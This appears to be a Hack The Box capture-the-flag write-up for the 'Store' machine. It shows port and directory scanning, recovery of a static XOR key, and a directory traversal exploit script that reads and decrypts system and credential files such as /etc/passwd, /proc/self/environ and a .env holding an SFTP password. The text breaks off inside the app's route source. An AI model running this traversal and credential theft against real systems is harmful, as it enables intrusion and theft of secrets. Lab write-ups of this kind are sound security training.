HTB: Store

Store has an ExpressJS website that offers file storage with military grade encryption. I’ll upload and retrieve files, but also find a way to leak the encrypted version of the files. The encryption is just a static nine-byte XOR. I’ll find a directory traversal to read files from the host, but they come back encrypted with the same key. I’ll decrypt them to leak an SFTP password. I’ll use the SFTP access to tunnel to a localhost port offering the nodejs inspect debugger, and use that to get a shell on the box. There I’ll find Chrome running as root and abuse its debug port to get execution.

Box Info

Recon

Initial Scanning

nmap finds four open TCP ports, SSH (22) and three HTTP (5000, 5001, 5002):

oxdf@hacky$ nmap -p- -vvv --min-rate 10000 10.129.31.17

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-28 03:15 UTC

...[snip]...

Nmap scan report for 10.129.31.17

Host is up, received reset ttl 63 (0.023s latency).

Scanned at 2025-10-28 03:15:19 UTC for 7s

Not shown: 65531 closed tcp ports (reset)

PORT STATE SERVICE REASON

22/tcp open ssh syn-ack ttl 63

5000/tcp open upnp syn-ack ttl 63

5001/tcp open commplex-link syn-ack ttl 63

5002/tcp open rfe syn-ack ttl 63

Read data files from: /usr/bin/../share/nmap

Nmap done: 1 IP address (1 host up) scanned in 6.92 seconds

Raw packets sent: 67991 (2.992MB) | Rcvd: 65650 (2.626MB)

oxdf@hacky$ nmap -p 22,5000,5001,5002 -sCV 10.129.31.17

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-28 03:15 UTC

Nmap scan report for 10.129.31.17

Host is up (0.023s latency).

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 256 30:68:b8:a8:f5:47:ca:bf:1a:23:97:d5:4c:77:97:da (ECDSA)

|_ 256 3f:83:9f:53:0a:49:db:00:d5:18:85:e9:2f:05:76:dd (ED25519)

5000/tcp open http Node.js (Express middleware)

|_http-title: Secure Encrypted Storage - 01001101 01101001 01101100 01101001...

5001/tcp open http Node.js (Express middleware)

|_http-title: Secure Encrypted Storage - 01001101 01101001 01101100 01101001...

5002/tcp open http Node.js (Express middleware)

|_http-title: Secure Encrypted Storage - 01001101 01101001 01101100 01101001...

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 16.45 seconds

Based on the OpenSSH version, the host is likely running Ubuntu 22.04 jammy LTS (or maybe 22.10 kinetic).

All of the ports show a TTL of 63, which matches the expected TTL for Linux one hop away.

Website - TCP 5000 / 5001 / 5002

Site



As far as I can tell, the three ports are hosting the same site, a “Secure Encrypted Storage” site:



The binary in the header decodes to “Military Grade” (not interesting):


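The same decode can be done in a couple of lines of Python. This is just a sketch using the full title string (nmap truncates it in its output); the helper name `decode_binary` is my own.

```python
# Full binary string from the page title (nmap only shows the first part).
title_bits = (
    "01001101 01101001 01101100 01101001 01110100 01100001 01110010 "
    "01111001 00100000 01000111 01110010 01100001 01100100 01100101"
)


def decode_binary(bits: str) -> str:
    """Convert space-separated 8-bit groups into ASCII text."""
    return "".join(chr(int(group, 2)) for group in bits.split())


decoded = decode_binary(title_bits)
print(decoded)
```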

Clicking “List Files” shows a pretty empty page:

“Upload Files” gives a form:

If I give it a file, it uploads and redirects to /. /list now shows the file:

Clicking leads to /file/0xdf.png, which shows the raw binary:



The download link at the bottom saves the file as data.bin, but opening it shows the original PNG. It’s a bit of an odd download link, as the link is not to another URL on the site, but rather the base64 encoded data for the image is stored in the link itself:
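As a rough sketch of what that link holds, the payload can be pulled out of a data URI with a regex and base64-decoded. The HTML fragment below is hypothetical (the real page markup may differ), and `extract_payload` is a name I made up for illustration.

```python
import base64
import re

# Hypothetical anchor tag; the attributes on the real page may differ.
encoded = base64.b64encode(b"this is a test\n").decode()
sample_html = (
    '<a download="data.bin" '
    f'href="data:application/octet-stream;charset=utf-8;base64,{encoded}">'
    "Download</a>"
)

DATA_URI_RE = re.compile(
    r"data:application/octet-stream;charset=utf-8;base64,([A-Za-z0-9+/=]+)"
)


def extract_payload(html: str) -> bytes:
    """Return the decoded bytes embedded in the first matching data URI."""
    match = DATA_URI_RE.search(html)
    if match is None:
        raise ValueError("no base64 data URI found")
    return base64.b64decode(match.group(1))


payload = extract_payload(sample_html)
print(payload)
```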

Tech Stack

The HTTP response headers show that this is ExpressJS (just like nmap):

HTTP/1.1 200 OK

X-Powered-By: Express

Content-Type: text/html; charset=utf-8

Content-Length: 1161

ETag: W/"489-WmtntEqn7sxOXR0efV6R4TvN9ws"

Date: Wed, 29 Oct 2025 02:30:38 GMT

Connection: keep-alive

Keep-Alive: timeout=5

The 404 is the default Express 404:

Directory Brute Force

I’ll run feroxbuster against the site. I’m using --dont-extract-links because it creates noise, and giving it a lowercase wordlist because the server doesn’t seem to care about case (starting feroxbuster with the default list shows a bunch of case repeats):

oxdf@hacky$ feroxbuster -u http://10.129.31.17:5000 --dont-extract-links -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt

___ ___ __ __ __ __ __ ___

|__ |__ |__) |__) | / ` / \ \_/ | | \ |__

| |___ | \ | \ | \__, \__/ / \ | |__/ |___

by Ben "epi" Risher 🤓 ver: 2.11.0

───────────────────────────┬──────────────────────

🎯 Target Url │ http://10.129.31.17:5000

🚀 Threads │ 50

📖 Wordlist │ /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt

👌 Status Codes │ All Status Codes!

💥 Timeout (secs) │ 7

🦡 User-Agent │ feroxbuster/2.11.0

🏁 HTTP methods │ [GET]

🔃 Recursion Depth │ 4

🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest

───────────────────────────┴──────────────────────

🏁 Press [ENTER] to use the Scan Management Menu™

──────────────────────────────────────────────────

404 GET 10l 15w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter

200 GET 1l 87w 1161c http://10.129.31.17:5000/

301 GET 10l 16w 179c http://10.129.31.17:5000/images => http://10.129.31.17:5000/images/

301 GET 10l 16w 173c http://10.129.31.17:5000/css => http://10.129.31.17:5000/css/

301 GET 10l 16w 173c http://10.129.31.17:5000/tmp => http://10.129.31.17:5000/tmp/

200 GET 1l 51w 807c http://10.129.31.17:5000/upload

200 GET 1l 65w 1509c http://10.129.31.17:5000/list

[####################] - 54s 106336/106336 0s found:6 errors:0

[####################] - 53s 26584/26584 498/s http://10.129.31.17:5000/

[####################] - 54s 26584/26584 497/s http://10.129.31.17:5000/images/

[####################] - 54s 26584/26584 497/s http://10.129.31.17:5000/css/

[####################] - 54s 26584/26584 497/s http://10.129.31.17:5000/tmp/

/tmp is interesting.

/tmp

If I brute force in this directory with some common extensions after uploading files, or just guess that perhaps my uploads are here, I’ll find that the same filenames are there, but the data is encrypted. For example, I’ll create a dummy file:

oxdf@hacky$ echo "this is a test" > test.txt



When I upload it, it’s on the site at /file/test.txt:

At /tmp/test.txt, there’s a file of the same length:

oxdf@hacky$ curl http://10.129.31.17:5000/tmp/test.txt -s | xxd

00000000: 3c05 5009 453e 3013 5968 195c 0911 5d <.P.E>0.Yh.\..]

oxdf@hacky$ xxd test.txt

00000000: 7468 6973 2069 7320 6120 7465 7374 0a this is a test.

It looks to be the encrypted copy.

Theory

My theory of the website at this point is that the site is encrypting files and storing them in /tmp, which isn’t meant to be available on the HTTP server. When a file is requested via /file/<filename>, the site is getting the encrypted file from /tmp, decrypting it, and returning it. That explains why the raw data is stored in the link, so it only has to be decrypted once.

Auth as sftpuser

Arbitrary File Read

Recover Encryption Key

Given that the encrypted file is the same length as the plaintext file, it’s likely using a stream cipher. It could be as simple as a static XOR key. From a Python terminal, I’ll run an experiment on a longer file I’ve uploaded:

oxdf@hacky$ python

Python 3.12.3 (main, Aug 14 2025, 17:47:21) [GCC 13.3.0] on linux

Type "help", "copyright", "credits" or "license" for more information.

>>> import requests

>>> resp = requests.get('http://10.129.31.17:5000/tmp/0xdf.png')

>>> enc = resp.content

>>> len(enc)

49946

>>> with open('/home/oxdf/Pictures/0xdf.png', 'rb') as f:

...     pt = f.read()

...

>>> len(pt)

49946

I’ll XOR the plaintext and the ciphertext to get a keystream:

>>> keystream = [c ^ p for c, p in zip(enc, pt)]

>>> keystream[:100]

[72, 109, 57, 122, 101, 87, 67, 51, 56, 72, 109, 57, 122, 101, 87, 67, 51, 56, 72, 109, 57, 122, 101, 87, 67, 51, 56, 72, 109, 57, 122, 101, 87, 67, 51, 56, 72, 109, 57, 122, 101, 87, 67, 51, 56, 72, 109, 57, 122, 101, 87, 67, 51, 56, 72, 109, 57, 122, 101, 87, 67, 51, 56, 72, 109, 57, 122, 101, 87, 67, 51, 56, 72, 109, 57, 122, 101, 87, 67, 51, 56, 72, 109, 57, 122, 101, 87, 67, 51, 56, 72, 109, 57, 122, 101, 87, 67, 51, 56, 72]

It certainly looks like a pattern! It’s even all ASCII:

>>> ''.join([chr(x) for x in keystream[:40]])

'Hm9zeWC38Hm9zeWC38Hm9zeWC38Hm9zeWC38Hm9z'

Looks like the key is a rotating nine characters: “Hm9zeWC38”. I can check this on another file:

>>> resp = requests.get('http://10.129.31.17:5000/tmp/test.txt')

>>> enc = resp.content

>>> len(enc)

15

>>> ''.join(chr(e ^ k) for e, k in zip(enc, keystream))

'this is a test\n'

It looks like the same key is used for all files.
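The key can also be recovered without eyeballing the pattern. Here’s a minimal sketch that takes the two xxd dumps of test.txt from earlier, XORs them, and looks for the shortest repeating unit. The function name `recover_key` is mine, and with only 15 bytes of sample the period is a best guess rather than proof.

```python
# Ciphertext and plaintext bytes copied from the two xxd dumps of test.txt.
enc = bytes.fromhex("3c055009453e30135968195c09115d")
pt = b"this is a test\n"


def recover_key(ciphertext: bytes, plaintext: bytes) -> bytes:
    """XOR known plaintext with ciphertext and return the shortest repeating unit."""
    keystream = bytes(c ^ p for c, p in zip(ciphertext, plaintext))
    for period in range(1, len(keystream) + 1):
        # A candidate period fits if every byte matches its position modulo the period.
        if all(keystream[i] == keystream[i % period] for i in range(len(keystream))):
            return keystream[:period]
    return keystream


key = recover_key(enc, pt)
print(key)
```

A longer known-plaintext sample (like the PNG) gives more confidence that the period is really nine bytes and not something longer.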

Directory Traversal



To check for directory traversal, I’ll use an “LFI” (though not really LFI) wordlist from SecLists on both /tmp and /file, as both are likely reading files from the file system. /tmp doesn’t find anything, but /file does:

oxdf@hacky$ feroxbuster -u http://10.129.31.17:5000/file/ -w /opt/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt -s 200

___ ___ __ __ __ __ __ ___

|__ |__ |__) |__) | / ` / \ \_/ | | \ |__

| |___ | \ | \ | \__, \__/ / \ | |__/ |___

by Ben "epi" Risher 🤓 ver: 2.11.0

───────────────────────────┬──────────────────────

🎯 Target Url │ http://10.129.31.17:5000/file/

🚀 Threads │ 50

📖 Wordlist │ /opt/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt

👌 Status Codes │ [200]

💥 Timeout (secs) │ 7

🦡 User-Agent │ feroxbuster/2.11.0

🔎 Extract Links │ true

🏁 HTTP methods │ [GET]

🔃 Recursion Depth │ 4

🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest

───────────────────────────┴──────────────────────

🏁 Press [ENTER] to use the Scan Management Menu™

──────────────────────────────────────────────────

200 GET 1l 30w 567c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter

200 GET 22l 186w 5593c http://10.129.31.17:5000/file/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

[####################] - 9s 933/933 0s found:1 errors:824

[####################] - 8s 930/930 113/s http://10.129.31.17:5000/file/

URL-encoding the / characters seems to work. I can validate this manually in Burp Repeater:

It works. But the file is encrypted:

That’s because the /file path is “decrypting” the files before returning them. In this case, “decrypting” an unencrypted file is encrypting it.
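This works because XOR with a fixed key is its own inverse. A small sketch to show it, using the nine-byte key recovered earlier (the helper `xor_bytes` is my own naming):

```python
import base64
from itertools import cycle

KEY = b"Hm9zeWC38"  # key recovered from the known-plaintext experiment


def xor_bytes(data: bytes, key: bytes = KEY) -> bytes:
    """XOR data against the key, repeating the key as needed."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


plain = b"root:x:0:0:root:/root:/bin/bash\n"
once = xor_bytes(plain)   # what the server returns for a plaintext file
twice = xor_bytes(once)   # applying the same operation again restores it

print(base64.b64encode(once)[:4], twice == plain)
```

Applying the operation to the first line of /etc/passwd produces bytes whose base64 begins with `OgJW`, the same prefix as the blob the server returns for that file.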

Decrypt

If it is XORed with the same keystream, I can decrypt it. I’ll grab the base64-encoded version from the link in the HTML response, and drop that into Python:

>>> from base64 import b64decode

>>> enc = b64decode(b'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')

>>> ''.join(chr(e ^ k) for e, k in zip(enc, keystream))

'root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\nmessagebus:x:102:105::/nonexistent:/usr/sbin/nologin\nsystemd-timesync:x:103:106:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin\nsyslog:x:104:111::/home/syslog:/usr/sbin/nologin\n_apt:x:105:65534::/nonexistent:/usr/sbin/nologin\ntss:x:106:112:TPM software stack,,,:/var/lib/tpm:/bin/false\nuuidd:x:107:113::/run/uuidd:/usr/sbin/nologin\ntcpdump:x:108:114::/nonexistent:/usr/sbin/nologin\nsshd:x:109:65534::/run/sshd:/usr/sbin/nologin\npollinate:x:110:1::/var/cache/pollinate:/bin/false\nlandscape:x:111:116::/var/lib/landscape:/usr/sbin/nologin\nfwupd-refresh:x:112:117:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin\nec2-instance-connect:x:113:65534::/nonexistent:/usr/sbin/nologin\n_chrony:x:114:121:Chrony 
daemon,,,:/var/lib/chrony:/usr/sbin/nologin\nubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash\nlxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false\ndev:x:1001:1001:,,,:/home/dev:/bin/bash\nsftpuser:x:1002:1002:,,,:/home/sftpuser:/bin/false\n_laurel:x:998:998::/var/log/laurel:/bin/false\n'

It works!

I’ll write a Python script that takes an absolute path on the target, reads the encrypted file using the directory traversal, decrypts it, and prints it:

#!/usr/bin/env -S uv run --script

# /// script

# requires-python = ">=3.12"

# dependencies = [

# "requests",

# ]

# ///

import base64

import re

import requests

import sys

from itertools import cycle

if len(sys.argv) != 3:

    print(f"usage: {sys.argv[0]} <host> <absolute path>")

    sys.exit()

host = sys.argv[1]

# URL-encode the slashes, as the traversal only worked with %2F

enc_path = sys.argv[2].replace('/', '%2f')

try:

    resp = requests.get(f'http://{host}:5000/file/..%2f..%2F..%2F..%2F..%2F..{enc_path}', timeout=0.5)

except requests.exceptions.ReadTimeout:

    # the server hangs on missing files, so treat a timeout as not found

    print("<File Not Found>")

    sys.exit()

# the page embeds the XORed file as base64 in the download link

enc_b64 = re.search(

    r'data:application/octet-stream;charset=utf-8;base64,(.+?)"',

    resp.text

).group(1)

enc = base64.b64decode(enc_b64)

pt = ''.join(chr(e^k) for e, k in zip(enc, cycle(b"Hm9zeWC38")))

print(pt)

When the file doesn’t exist, the server hangs for a long time without responding. I’ve compensated for this with a timeout.

It works:

oxdf@hacky$ ./file_read.py 10.129.31.17 /etc/hostname

store

oxdf@hacky$ ./file_read.py 10.129.31.17 /etc/notarealfile

<File Not Found>

Host System Enumeration

General

I’ll start with /etc/passwd:

oxdf@hacky$ ./file_read.py 10.129.31.17 /etc/passwd | grep 'sh$'

root:x:0:0:root:/root:/bin/bash

ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash

dev:x:1001:1001:,,,:/home/dev:/bin/bash

oxdf@hacky$ ./file_read.py 10.129.31.17 /etc/passwd

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/usr/sbin/nologin

man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin

irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin

systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin

messagebus:x:102:105::/nonexistent:/usr/sbin/nologin

systemd-timesync:x:103:106:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin

syslog:x:104:111::/home/syslog:/usr/sbin/nologin

_apt:x:105:65534::/nonexistent:/usr/sbin/nologin

tss:x:106:112:TPM software stack,,,:/var/lib/tpm:/bin/false

uuidd:x:107:113::/run/uuidd:/usr/sbin/nologin

tcpdump:x:108:114::/nonexistent:/usr/sbin/nologin

sshd:x:109:65534::/run/sshd:/usr/sbin/nologin

pollinate:x:110:1::/var/cache/pollinate:/bin/false

landscape:x:111:116::/var/lib/landscape:/usr/sbin/nologin

fwupd-refresh:x:112:117:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin

ec2-instance-connect:x:113:65534::/nonexistent:/usr/sbin/nologin

_chrony:x:114:121:Chrony daemon,,,:/var/lib/chrony:/usr/sbin/nologin

ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash

lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false

dev:x:1001:1001:,,,:/home/dev:/bin/bash

sftpuser:x:1002:1002:,,,:/home/sftpuser:/bin/false

_laurel:x:998:998::/var/log/laurel:/bin/false

ubuntu and dev are the non-root users with shells set. I’ll take a look at the environment variables in the current process with /proc/self/environ (which returns null-separated values, so I’ll use tr to replace those with newlines):

oxdf@hacky$ ./file_read.py 10.129.31.17 /proc/self/environ | tr '\00' '\n'

USER=dev

npm_config_user_agent=npm/8.5.1 node/v12.22.9 linux x64 workspaces/false

npm_node_execpath=/usr/bin/node

npm_config_noproxy=

HOME=/home/dev

npm_package_json=/home/dev/projects/store1/package.json

npm_config_userconfig=/home/dev/.npmrc

npm_config_local_prefix=/home/dev/projects/store1

SYSTEMD_EXEC_PID=841

COLOR=0

npm_config_metrics_registry=https://registry.npmjs.org/

LOGNAME=dev

JOURNAL_STREAM=8:6217

npm_config_prefix=/usr/local

npm_config_cache=/home/dev/.npm

npm_config_node_gyp=/usr/share/nodejs/node-gyp/bin/node-gyp.js

PATH=/home/dev/projects/store1/node_modules/.bin:/home/dev/projects/store1/node_modules/.bin:/home/dev/projects/node_modules/.bin:/home/dev/node_modules/.bin:/home/node_modules/.bin:/node_modules/.bin:/usr/share/nodejs/@npmcli/run-script/lib/node-gyp-bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

INVOCATION_ID=4abbfc48b5e44622bb0ac38ca33addb7

NODE=/usr/bin/node

LANG=C.UTF-8

npm_lifecycle_script=nodemon --exec 'node --inspect=127.0.0.1:9229 /home/dev/projects/store1/start.js'

SHELL=/bin/bash

npm_lifecycle_event=watch

npm_config_globalconfig=/etc/npmrc

npm_config_init_module=/home/dev/.npm-init.js

npm_config_globalignorefile=/etc/npmignore

npm_execpath=/usr/share/nodejs/npm/bin/npm-cli.js

PWD=/home/dev/projects/store1

npm_config_global_prefix=/usr/local

npm_command=run-script

INIT_CWD=/home/dev/projects/store1

EDITOR=vi

It’s running as the dev user. The npm_lifecycle_script looks like what starts the webserver. That’s confirmed by reading /proc/self/cmdline (with nulls replaced with spaces):

oxdf@hacky$ ./file_read.py 10.129.31.17 /proc/self/cmdline | tr '\00' ' '

node --inspect=127.0.0.1:9229 /home/dev/projects/store1/start.js

The presence of --inspect is interesting and I’ll come back to this.
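The null-separated format of /proc/self/environ and /proc/self/cmdline is also easy to handle in Python rather than with tr. This is a sketch with sample bytes built from a few of the values shown above; `parse_environ` and `parse_cmdline` are names I picked for illustration.

```python
def parse_environ(raw: bytes) -> dict[str, str]:
    """Split a /proc/<pid>/environ blob into a name -> value mapping."""
    env = {}
    for entry in raw.split(b"\x00"):
        if not entry:
            continue  # a trailing NUL leaves an empty final entry
        name, _, value = entry.decode(errors="replace").partition("=")
        env[name] = value
    return env


def parse_cmdline(raw: bytes) -> list[str]:
    """Split a /proc/<pid>/cmdline blob into its argument list."""
    return [arg.decode(errors="replace") for arg in raw.split(b"\x00") if arg]


# Sample data assembled from values in the output above.
sample_environ = b"USER=dev\x00HOME=/home/dev\x00PWD=/home/dev/projects/store1\x00"
sample_cmdline = b"node\x00--inspect=127.0.0.1:9229\x00/home/dev/projects/store1/start.js\x00"

env = parse_environ(sample_environ)
argv = parse_cmdline(sample_cmdline)
print(env["USER"], argv)
```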

I’ll check for SSH keys or other interesting things in the dev user’s home directory, but don’t find much.

Web Source



I’ll grab start.js:

require('dotenv').config();

const app = require('./app');

const server = app.listen(process.env.PORT, () => {

console.log(`Express is running on port ${server.address().port}`);

});

There are two interesting bits here:

- The dotenv package will read environment variables from a .env file in the same directory.

- The main webserver code is in app.js.

The .env file has four items:

SFTP_URL=sftp://sftpuser:WidK52pWBtWQdcVC@localhost

SECRET=Hm9zeWC38

STORE_HOME=/home/dev/projects/store1

PORT=5000

It’s interesting that it’s only port 5000 (where do 5001 and 5002 come from?). The SECRET is the encryption XOR key. There are creds for sftpuser, which passwd shows has UID 1002 but with its shell set to /bin/false. I’ll come back to this.
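The SFTP_URL value packs the host and credentials into a single URL. A quick sketch of splitting it apart with Python’s standard library (the fallback to port 22 is my assumption of the usual SSH default when the URL doesn’t give one):

```python
from urllib.parse import urlsplit

sftp_url = "sftp://sftpuser:WidK52pWBtWQdcVC@localhost"

parts = urlsplit(sftp_url)
creds = {
    "host": parts.hostname,
    "port": parts.port or 22,  # no port in the URL, so assume the SSH default
    "username": parts.username,
    "password": parts.password,
}
print(creds)
```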

app.js sets up ExpressJS and the routes in ./routes:

const express = require('express');

const path = require('path');

const routes = require('./routes/index');

const bodyParser = require('body-parser');

const app = express();

app.set('views', path.join(__dirname, 'views'));

app.set('view engine', 'pug');

app.use(express.static('public'));

app.use(bodyParser.urlencoded({ extended: true }));

app.use('/', routes);

module.exports = app;

/home/dev/projects/store1/routes/index.js has the guts of the application:

const express = require('express');

const SFTPClient = require('../sftp').SFTPClient;

const multer = require('multer')

const path = require('path');

const xorFileContents = require('../crypto').xorFileContents;

const router = express.Router();

var storage = multer.diskStorage({

destination: function (req, file, cb) {

cb(null, 'public/tmp/')

},

filename: function (req, file, cb) {

cb(null, file.originalname)

}

})

var upload = multer({ storage: storage })

const parsedURL = new URL(process.env.SFTP_URL);

const port = parsedURL.port || 22;

const { host, username, password } = parsedURL;

const client = new SFTPClient();

